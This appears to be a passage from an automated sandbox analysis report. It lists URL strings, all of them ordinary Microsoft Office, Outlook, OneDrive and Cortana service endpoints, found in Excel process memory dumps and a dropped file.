Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://augloop.office.comLinkRequestApiPageTitleRetrievalhttps://uci.
Source: EXCEL.EXE, 00000000.00000003.449854061.000000000FC27000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.426807499.000000000FC27000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253942258.000000001313E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436557728.000000000FC27000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.586689452.000000000FC27000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458047571.000000000FC27000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253149330.0000000013141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253364496.000000000FC27000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlL
Source: 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://cdn.entity.
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsellSkyDriveSignUpUpsellImageht
Source: EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsellaM
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsellLiveProfileServicehttps
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://clients.config.office.net/Bearer
Source: EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://clients.config.office.net/https://login.windows.net/common/oauth2/authorize
Source: 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policieshttps://login.windows.net/common/oauth2/
Source: 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://clients.config.office.net/user/v1.0/iosBearer
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://clients.config.office.net/user/v1.0/ioshttps://login.windows.net/common/oauth2/authorize
Source: 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://clients.config.office.net/user/v1.0/macBearer
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://clients.config.office.net/user/v1.0/machttps://login.windows.net/common/oauth2/authorize
Source: 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeyBearer
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeyhttps://login.windows.net/common/oau
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspxOneNoteCloudFilesConsumerEmbedhttps://onedrive.live.com/em
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://config.edge.skype.com/config/v1/Officeh
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://cortana.ai
Source: 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://cortana.ai/api
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://cortana.ai/apiB
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://cortana.ai/apiBearer
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://cortana.ai/apihttps://login.windows.net/common/oauth2/authorize
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://cortana.aiK
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://cr.office.com
Source: 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://dataservice.o365filtering.com%
Source: 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileBearer
Source: EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://dataservice.o365filtering.com/https://login.windows.net/common/oauth2/authorize
Source: EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp	String found in binary or memory: https://dataservice.o365filtering.com8Q
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://dataservice.o365filtering.comB
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://dataservice.o365filtering.coml
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBearer
Source: EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileJL;
Source: EXCEL.EXE, 00000000.00000002.586543409.000000000FBA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesBearer
Source: 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://dev.cortana.aiBearer
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://dev.cortana.aihttps://login.windows.net/common/oauth2/authorize
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
